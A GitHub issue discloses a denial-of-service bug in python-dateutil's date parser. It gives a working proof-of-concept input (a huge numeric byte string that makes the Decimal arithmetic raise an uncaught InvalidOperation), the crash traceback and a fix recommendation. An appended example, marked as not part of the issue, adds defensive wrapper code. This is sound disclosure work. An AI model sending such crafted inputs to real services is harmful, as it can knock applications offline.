
[Crash] Unhandled DecimalException while parsing an arbitrary date leads to DoS #1359

Open
pventuzelo opened this issue Apr 6, 2024 · 0 comments

The crash occurs when the parser (via the parse function) tries to decode an arbitrary user input without sanitizing it first. The library then crashes due to an unhandled OverflowError error.

PoC

# PoC.py
from dateutil.parser import parse

# Oversized numeric token followed by ':' reaches _parse_min_sec, where `value % 1`
# on a Decimal wider than the context precision raises decimal.InvalidOperation.
parse(b'9999999999999999999999999999999999999999939999999999999999999999999999:99999999999999999999999999999\n9')

Crash

Traceback (most recent call last):
  File "poc_InvalidOperation_DecimalException.py", line 3, in <module>
    parse(b'9999999999999999999999999999999999999999939999999999999999999999999999:99999999999999999999999999999\n9')
  File "/home/scop/.local/lib/python3.8/site-packages/dateutil/parser/_parser.py", line 1368, in parse
    return DEFAULTPARSER.parse(timestr, **kwargs)
  File "/home/scop/.local/lib/python3.8/site-packages/dateutil/parser/_parser.py", line 640, in parse
    res, skipped_tokens = self._parse(timestr, **kwargs)
  File "/home/scop/.local/lib/python3.8/site-packages/dateutil/parser/_parser.py", line 740, in _parse
    i = self._parse_numeric_token(l, i, info, ymd, res, fuzzy)
  File "/home/scop/.local/lib/python3.8/site-packages/dateutil/parser/_parser.py", line 942, in _parse_numeric_token
    (res.minute, res.second) = self._parse_min_sec(value)
  File "/home/scop/.local/lib/python3.8/site-packages/dateutil/parser/_parser.py", line 1106, in _parse_min_sec
    sec_remainder = value % 1
decimal.InvalidOperation: [<class 'decimal.DivisionImpossible'>]

Recommendation

To catch decimal.InvalidOperation, you need to catch DecimalException.

Impact

This vulnerability is making Python trigger an exception and crash, leading to a denial of service (DoS).
Vulnerability type: CWE-248: Uncaught Exception

(I originally reported this bug through private disclosure via huntr bug bounty platform but it was closed as informative... I don't agree, it's a major library used by a lot of projects and can impact a lot of AI/ML projects as well)
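Added example, not part of the issue or of dateutil's own code: it reproduces the arithmetic at the failing line (`sec_remainder = value % 1`) with the standard `decimal` module alone, confirms that the raised `InvalidOperation` is a `DecimalException` (and hence an `ArithmeticError`), and shows a caller-side wrapper that bounds input length and contains the exception. `toy_min_sec` is a simplified stand-in for dateutil's `_parse_min_sec`, and `safe_parse`, its `max_len` parameter and the constructed sample tokens are assumptions of this example.

```python
from decimal import Decimal, DecimalException, InvalidOperation, getcontext


def trigger_crash():
    """Reproduce the root cause without dateutil.

    Decimal remainder raises DivisionImpossible (surfaced as InvalidOperation)
    when the integer part of the quotient needs more digits than the context
    precision (28 by default). A 70-digit token therefore cannot do `value % 1`.
    Returns the exception instance so callers can inspect its class.
    """
    wide = Decimal("9" * (getcontext().prec + 42))  # constructed: far wider than prec
    try:
        wide % 1
    except DecimalException as exc:  # InvalidOperation is a DecimalException
        return exc
    return None


def toy_min_sec(token):
    """Simplified stand-in (assumption, not dateutil's code) for the
    minute/second split at the crashing line: minute = int part,
    second = fractional part scaled to 60."""
    value = Decimal(token)
    minute = int(value)
    sec_remainder = value % 1          # the operation that raises in the traceback
    second = int(sec_remainder * 60) if sec_remainder else 0
    return minute, second


def safe_parse(raw, parse_fn, max_len=64):
    """Caller-side hardening for untrusted timestamps.

    1. Reject over-long input before any arithmetic runs.
    2. Catch the whole DecimalException family plus the ValueError/OverflowError
       that date parsers raise on malformed input, so one bad request cannot
       take the process down.
    Returns (result, None) on success or (None, reason) on rejection.
    """
    if isinstance(raw, bytes):
        raw = raw.decode("ascii", errors="replace")
    if len(raw) > max_len:
        return None, "too long"
    try:
        return parse_fn(raw), None
    except (ValueError, OverflowError, DecimalException) as exc:
        return None, type(exc).__name__


if __name__ == "__main__":
    exc = trigger_crash()
    print(type(exc).__name__, isinstance(exc, ArithmeticError))
    print(safe_parse("12.5", toy_min_sec))
    print(safe_parse("9" * 70, toy_min_sec))
    print(safe_parse("9" * 70, toy_min_sec, max_len=100))
```

The length check is the cheap first line of defence: a legitimate timestamp never needs a 70-digit minute field, so rejecting it up front avoids even reaching the Decimal arithmetic. The broad `except` is the second line, and it is what the issue's recommendation amounts to, since `DecimalException` is the common base of `InvalidOperation`, `DivisionImpossible` and the other decimal signals.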

@pventuzelo pventuzelo changed the title Unhandled DecimalException while parsing an arbitrary date leads to DoS [Crash] Unhandled DecimalException while parsing an arbitrary date leads to DoS Apr 6, 2024